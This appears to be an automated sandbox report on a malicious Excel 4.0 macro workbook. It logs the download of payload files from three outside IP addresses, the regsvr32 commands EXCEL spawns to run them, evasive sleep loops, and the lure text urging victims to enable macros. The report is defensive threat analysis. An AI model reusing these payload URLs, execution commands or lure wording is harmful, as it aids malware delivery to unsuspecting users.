Windows Analysis Report Decline-172917164-06242021.xlsm

Overview

General Information

Sample Name: Decline-172917164-06242021.xlsm
Analysis ID: 440340
MD5: f022a2159442cd4e16d7fe3dee1d634b
SHA1: cd4a698d83059462498e48b8dec47662bd2a0ec4
SHA256: 4bd593279e649fae847a2b702655c571d7ca9e1949a422fa8d289250aeaa3305
Tags: xlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

AV Detection:

barindex
Multi AV Scanner detection for submitted file
Source: Decline-172917164-06242021.xlsm Virustotal: Detection: 17% Perma Link
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 5.253.62.174:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 5.253.62.174:80

Networking:

barindex
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /44372.3504680556.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.253.62.174Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44372.3504680556.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.234.247.7Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 5.253.62.174
Source: unknown TCP traffic detected without corresponding DNS query: 5.253.62.174
Source: unknown TCP traffic detected without corresponding DNS query: 5.253.62.174
Source: unknown TCP traffic detected without corresponding DNS query: 5.253.62.174
Source: unknown TCP traffic detected without corresponding DNS query: 185.117.73.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.117.73.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.117.73.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.117.73.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.117.73.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.117.73.74
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.7
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.7
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.7
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.7
Source: unknown TCP traffic detected without corresponding DNS query: 5.253.62.174
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.7
Source: unknown TCP traffic detected without corresponding DNS query: 185.234.247.7
Source: unknown TCP traffic detected without corresponding DNS query: 5.253.62.174
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AD7B9C26.tif Jump to behavior
Source: global traffic HTTP traffic detected: GET /44372.3504680556.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.253.62.174Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /44372.3504680556.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.234.247.7Connection: Keep-Alive
Source: regsvr32.exe, 00000003.00000002.2239080229.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2219822034.00000000048D0000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000003.00000002.2239080229.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2219822034.00000000048D0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000003.00000002.2239080229.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2219822034.00000000048D0000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000003.00000002.2239296805.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2220106197.0000000004AB7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000003.00000002.2239296805.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2220106197.0000000004AB7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000003.00000002.2235431852.0000000003AE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2216228540.0000000003A90000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2234626152.0000000001D20000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2215271352.0000000001CF0000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000003.00000002.2239296805.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2220106197.0000000004AB7000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000003.00000002.2239296805.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2220106197.0000000004AB7000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000003.00000002.2235431852.0000000003AE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2216228540.0000000003A90000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000003.00000002.2239080229.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2219822034.00000000048D0000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000003.00000002.2239296805.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2220106197.0000000004AB7000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000003.00000002.2239080229.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2219822034.00000000048D0000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.2219822034.00000000048D0000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Document image extraction number: 0 Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
Source: Document image extraction number: 0 Screenshot OCR: Enable Content button from the yellow bar above
Found Excel 4.0 Macro with suspicious formulas
Source: Decline-172917164-06242021.xlsm Initial sample: EXEC
Source: regsvr32.exe, 00000003.00000002.2239080229.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2219822034.00000000048D0000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal72.expl.evad.winXLSM@7/7@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Decline-172917164-06242021.xlsm Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRCCD0.tmp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Decline-172917164-06242021.xlsm Virustotal: Detection: 17%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Decline-172917164-06242021.xlsm Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Decline-172917164-06242021.xlsm Initial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\regsvr32.exe TID: 2228 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 532 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 2592 Thread sleep time: -60000s >= -30000s Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 440340 Sample: Decline-172917164-06242021.xlsm Startdate: 25/06/2021 Architecture: WINDOWS Score: 72 25 Multi AV Scanner detection for submitted file 2->25 27 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->27 29 Sigma detected: Microsoft Office Product Spawning Windows Shell 2->29 31 2 other signatures 2->31 6 EXCEL.EXE 83 39 2->6         started        process3 dnsIp4 19 185.234.247.7, 49168, 80 INTERKONEKT-ASPL Russian Federation 6->19 21 185.117.73.74, 80 HSAE Netherlands 6->21 23 5.253.62.174, 49165, 80 DDOS-GUARDRU Russian Federation 6->23 17 C:\...\~$Decline-172917164-06242021.xlsm, data 6->17 dropped 33 Document exploit detected (UrlDownloadToFile) 6->33 11 regsvr32.exe 6->11         started        13 regsvr32.exe 6->13         started        15 regsvr32.exe 6->15         started        file5 signatures6 process7
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.234.247.7
 unknown Russian Federation
198004 INTERKONEKT-ASPL false
5.253.62.174
 unknown Russian Federation
57724 DDOS-GUARDRU false
185.117.73.74
 unknown Netherlands
60117 HSAE false

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.234.247.7/44372.3504680556.dat false
  • Avira URL Cloud: safe
 unknown
http://5.253.62.174/44372.3504680556.dat false
  • Avira URL Cloud: safe
 unknown